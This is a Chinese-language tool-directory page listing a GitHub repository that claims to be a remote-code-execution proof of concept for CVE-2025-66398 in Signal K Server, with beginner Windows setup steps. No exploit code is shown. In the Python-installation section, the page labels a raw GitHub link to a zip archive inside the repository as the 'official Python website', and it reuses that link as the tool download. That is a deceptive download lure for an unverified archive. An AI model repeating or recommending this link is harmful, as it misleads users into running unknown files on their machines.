Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-66398 — 演示如何利用 Signal K Server CVE-2025-66398,该漏洞允许未认证攻击者注入后门并实现远程代码执行。 | Kitploit
工具/GitHubGitHub/showy-headteacher114/cve-2025-66398
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

演示如何利用 Signal K Server CVE-2025-66398,该漏洞允许未认证攻击者注入后门并实现远程代码执行。

查看仓库
132天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚠️ cve-2025-66398 - 简单RCE概念验证工具

下载


⚙️ 关于本工具

该项目演示了 Signal K Server 2.18.0 及更早版本中的一个远程代码执行(RCE)漏洞。概念验证(PoC)展示了攻击者如何在易受攻击的设备上执行命令。

本工具专为安全测试人员、系统管理员或任何对了解此安全问题感兴趣的人设计。运行本工具无需任何编程技能,但具备基本的计算机操作知识会有所帮助。


🖥️ 系统要求

  • Windows 10 或更高版本
  • 至少 2 GB 空闲内存
  • 100 MB 空闲磁盘空间
  • 用于下载文件的互联网连接
  • 不需要管理员权限

📥 如何下载和安装

点击下方按钮访问项目页面并下载文件。

下载

步骤 1:访问下载页面

进入上方链接。您将在 GitHub 页面上看到文件和文件夹列表。

步骤 2:下载 ZIP 文件

找到页面右上角附近的绿色 按钮。点击它并选择 。

Code
Download ZIP

步骤 3:解压文件

  • 在下载文件夹中找到下载的 ZIP 文件。
  • 右键点击 ZIP 文件并选择 全部提取。
  • 选择要存放文件的文件夹,然后点击 提取。

步骤 4:定位应用程序

打开已解压的文件夹。您应该会看到与项目相关的文件,例如脚本和文档。


▶️ 如何在 Windows 上运行工具

该项目使用 Python 和 Go 编写的脚本。要运行该工具,您将使用一个简单的命令提示符窗口。

步骤 1:打开命令提示符

  • 按键盘上的 Win + R。
  • 输入 cmd 并按下 Enter。

步骤 2:导航到文件夹

输入以下命令,将 path\to\folder 替换为您解压后的文件夹路径:

root@kitploit:~
cd path\to\folder

按下 Enter。

步骤 3:运行脚本

您可能会找到一个名为 run.bat 或 start.bat 的脚本。如果有,输入其名称并按 Enter。例如:

root@kitploit:~
run.bat

如果没有 BAT 文件,请查找以 .py 结尾的 Python 脚本。您需要在电脑上安装 Python(参见下一节)。

输入以下命令运行:

root@kitploit:~
python scriptname.py

将 scriptname.py 替换为实际文件名。


🐍 安装 Python(如果需要)

如果出现错误提示“Python 未识别”,则需要安装 Python。

步骤 1:下载 Python

访问 Python 官方网站:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

点击最新的 Windows 安装程序并下载。

步骤 2:安装 Python

  • 运行下载的安装程序。
  • 在点击 立即安装 之前,勾选 将 Python 添加到 PATH 复选框。
  • 等待安装完成。

步骤 3:验证 Python 安装

打开一个新的命令提示符窗口并输入:

root@kitploit:~
python --version

应该会显示已安装的 Python 版本。


🚨 安全运行工具

本工具仅用于测试和学习特定漏洞。请在安全环境中使用,例如测试网络或隔离的机器。

切勿在您不拥有或未经许可测试的系统上运行。


🔍 工具工作原理

该工具扫描运行 Signal K Server 版本 2.18.0 或更早版本的设备。它尝试发送利用漏洞的命令,并检查目标是否执行这些命令。

这使得安全专业人员能够确认其系统是否易受攻击,并采取相应措施进行更新或加固。


💡 故障排除

  • 如果工具无法启动,请检查您是否在命令提示符中位于正确的文件夹。
  • 确保 Python 已安装并添加到系统 PATH 中。
  • 关闭可能阻止网络访问的其他应用程序。
  • 如果遇到权限错误,请以管理员身份运行命令提示符。
  • 确保目标设备在网络中可达。

📄 其他资源

有关 CVE-2025-66398 漏洞的更多信息,请搜索安全数据库或 GitHub 上的相关研究。


🔗 下载链接

访问此页面下载工具文件:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

下载工具